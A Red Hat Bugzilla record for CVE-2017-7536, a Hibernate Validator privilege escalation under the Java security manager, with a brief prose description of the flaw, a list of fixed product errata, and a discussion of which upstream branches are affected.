Bug 1465573 (CVE-2017-7536) - CVE-2017-7536 hibernate-validator: Privilege escalation when running under the security manager
Summary: CVE-2017-7536 hibernate-validator: Privilege escalation when running under th...
Status: CLOSED ERRATA
Alias: CVE-2017-7536
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard: impact=moderate,public=20170926,repor...
Keywords: Security
Depends On: 1470920 1472059 1576141 1576142
Blocks: 1465576 1493931 1520314
TreeView+ depends on / blocked
 
Reported: 2017-06-27 16:26 UTC by Andrej Nemec
Modified: 2019-06-11 11:13 UTC (History)
98 users (show)

(edit)
It was found that when the security manager's reflective permissions, which allows it to access the private members of the class, are granted to Hibernate Validator, a potential privilege escalation can occur. By allowing the calling code to access those private members without the permission an attacker may be able to validate an invalid instance and access the private member value via ConstraintViolation#getInvalidValue().
Clone Of:
(edit)
Last Closed: 2019-06-08 03:15:40 UTC


Attachments (Terms of Use)


External Trackers
Tracker ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2017:2808 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 22:39:54 UTC
Red Hat Product Errata RHSA-2017:2809 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 22:51:56 UTC
Red Hat Product Errata RHSA-2017:2810 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform security update 2017-09-26 21:58:02 UTC
Red Hat Product Errata RHSA-2017:2811 normal SHIPPED_LIVE Important: eap7-jboss-ec2-eap security update 2017-09-26 23:14:16 UTC
Red Hat Product Errata RHSA-2017:3141 normal SHIPPED_LIVE Important: rhvm-appliance security, bug fix, and enhancement update 2017-11-07 22:23:02 UTC
Red Hat Product Errata RHSA-2017:3454 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform 7.1.0 security update 2017-12-13 22:48:09 UTC
Red Hat Product Errata RHSA-2017:3455 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform 7.1.0 security update 2017-12-13 22:57:25 UTC
Red Hat Product Errata RHSA-2017:3456 normal SHIPPED_LIVE Important: Red Hat JBoss Enterprise Application Platform 7.1.0 security update 2017-12-13 22:31:03 UTC
Red Hat Product Errata RHSA-2017:3458 normal SHIPPED_LIVE Important: eap7-jboss-ec2-eap security update 2017-12-13 23:26:13 UTC
Red Hat Product Errata RHSA-2018:2740 None None None 2018-09-24 21:46 UTC
Red Hat Product Errata RHSA-2018:2741 None None None 2018-09-24 22:04 UTC
Red Hat Product Errata RHSA-2018:2742 None None None 2018-09-24 22:08 UTC
Red Hat Product Errata RHSA-2018:2743 None None None 2018-09-24 22:10 UTC
Red Hat Product Errata RHSA-2018:2927 None None None 2018-10-16 15:20 UTC
Red Hat Product Errata RHSA-2018:3817 None None None 2018-12-11 14:12 UTC

Description Andrej Nemec 2017-06-27 16:26:07 UTC
A vulnerability which allows for a potential privilege escalation was found in the Hibernate Validator. If a security manager is present and HV itself is allowed to access private members reflectively as per the SM's configuration, that'll allow calling code without that permission to get hold of private state. The attack vector is to declare a constraint on a private member using XML, validate an invalid instance of that type and access the private member value via ConstraintViolation#getInvalidValue().

Comment 1 Andrej Nemec 2017-06-27 16:26:41 UTC
Acknowledgments:

Name: Gunnar Morling (Red Hat)

Comment 2 Gunnar Morling 2017-07-06 13:10:27 UTC
Hi, we'd like to know how to proceed in this matter. Specifically we are about to release Hibernate Validator 6 (the reference implementation of Bean Validation 2.0) soon. Can we provide a fix for that issue in this new major version at this point in time? Our plan is to check for a specific permission which the caller must possess in order to validate constraints on private members when a security manager is enabled. We'd like to be sure though whether we can provide this solution while this bug record for Hibernate Validator 5.x still is open. Thanks!

Comment 11 Jason Shepherd 2017-09-07 03:30:33 UTC
Red Hat Mobile Platform Millicore component does run with a security manager enabled, marking it as not affected.

Comment 12 errata-xmlrpc 2017-09-26 17:59:53 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0.8

Via RHSA-2017:2810 https://access.redhat.com/errata/RHSA-2017:2810

Comment 13 errata-xmlrpc 2017-09-26 18:42:36 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7

Via RHSA-2017:2808 https://access.redhat.com/errata/RHSA-2017:2808

Comment 14 errata-xmlrpc 2017-09-26 18:54:53 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6

Via RHSA-2017:2809 https://access.redhat.com/errata/RHSA-2017:2809

Comment 15 errata-xmlrpc 2017-09-26 19:16:13 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 7
  Red Hat JBoss Enterprise Application Platform 7.0 for RHEL 6

Via RHSA-2017:2811 https://access.redhat.com/errata/RHSA-2017:2811

Comment 16 errata-xmlrpc 2017-11-07 17:32:52 UTC
This issue has been addressed in the following products:

  RHEV 4.X RHEV-H and Agents for RHEL-7

Via RHSA-2017:3141 https://access.redhat.com/errata/RHSA-2017:3141

Comment 17 errata-xmlrpc 2017-12-13 17:36:13 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform

Via RHSA-2017:3456 https://access.redhat.com/errata/RHSA-2017:3456

Comment 18 errata-xmlrpc 2017-12-13 18:28:08 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.1 for RHEL 6

Via RHSA-2017:3454 https://access.redhat.com/errata/RHSA-2017:3454

Comment 19 errata-xmlrpc 2017-12-13 18:44:25 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.1 for RHEL 7

Via RHSA-2017:3455 https://access.redhat.com/errata/RHSA-2017:3455

Comment 20 errata-xmlrpc 2017-12-13 18:54:51 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 7.1 for RHEL 7
  Red Hat JBoss Enterprise Application Platform 7.1 for RHEL 6

Via RHSA-2017:3458 https://access.redhat.com/errata/RHSA-2017:3458

Comment 21 Salvatore Bonaccorso 2017-12-28 08:57:57 UTC
Hi

Would it be possible to indicate where the issue was fixed? In Debian we ship libhibernate-validator-java and we would like to clarify if/how we are affected by the issue. Is there any furher reference?

Thank you already!

Regards,
Salvatore

Comment 23 Fabio Olive Leite 2017-12-28 17:19:16 UTC
Setting needinfo to Bharti Kundal so that she sees it.

Comment 24 Bharti Kundal 2018-01-02 07:57:01 UTC
(In reply to Salvatore Bonaccorso from comment #21)
> Hi
> 
> Would it be possible to indicate where the issue was fixed? In Debian we
> ship libhibernate-validator-java and we would like to clarify if/how we are
> affected by the issue. Is there any furher reference?
> 
> Thank you already!
> 
> Regards,
> Salvatore

Hi Salvatore,

The issue affected all the HV 5.x branches (so 5.2, 5.3, 5.4 are all affected). 6 is not.

It's fixed in the upstream 5.2 branch .The branch is here: https://github.com/hibernate/hibernate-validator/tree/5.2

Does this help?

Thanks and Regards,
Bharti

Comment 25 Salvatore Bonaccorso 2018-01-02 08:18:17 UTC
Hi Bharti!

(In reply to Bharti Kundal from comment #24)
> (In reply to Salvatore Bonaccorso from comment #21)
> > Hi
> > 
> > Would it be possible to indicate where the issue was fixed? In Debian we
> > ship libhibernate-validator-java and we would like to clarify if/how we are
> > affected by the issue. Is there any furher reference?
> > 
> > Thank you already!
> > 
> > Regards,
> > Salvatore
> 
> Hi Salvatore,
> 
> The issue affected all the HV 5.x branches (so 5.2, 5.3, 5.4 are all
> affected). 6 is not.
> 
> It's fixed in the upstream 5.2 branch .The branch is here:
> https://github.com/hibernate/hibernate-validator/tree/5.2
> 
> Does this help?

Yes, thanks, that helps!

Regards,
Salvatore

Comment 31 errata-xmlrpc 2018-09-24 21:46:28 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform

Via RHSA-2018:2740 https://access.redhat.com/errata/RHSA-2018:2740

Comment 32 errata-xmlrpc 2018-09-24 22:04:21 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 7

Via RHSA-2018:2741 https://access.redhat.com/errata/RHSA-2018:2741

Comment 33 errata-xmlrpc 2018-09-24 22:08:15 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 5

Via RHSA-2018:2742 https://access.redhat.com/errata/RHSA-2018:2742

Comment 34 errata-xmlrpc 2018-09-24 22:09:32 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6

Via RHSA-2018:2743 https://access.redhat.com/errata/RHSA-2018:2743

Comment 35 errata-xmlrpc 2018-10-16 15:19:30 UTC
This issue has been addressed in the following products:

  Red Hat Satellite 6.4 for RHEL 7

Via RHSA-2018:2927 https://access.redhat.com/errata/RHSA-2018:2927

Comment 36 errata-xmlrpc 2018-12-11 14:12:25 UTC
This issue has been addressed in the following products:

  Red Hat JBoss Fuse

Via RHSA-2018:3817 https://access.redhat.com/errata/RHSA-2018:3817

Comment 37 Joshua Padman 2019-05-15 22:45:23 UTC
This vulnerability is out of security support scope for the following products:
 * Red Hat Enterprise Application Platform 5
 * Red Hat JBoss Operations Network 3

Please refer to https://access.redhat.com/support/policy/updates/jboss_notes for more details.


Note You need to log in before you can comment on or make changes to this bug.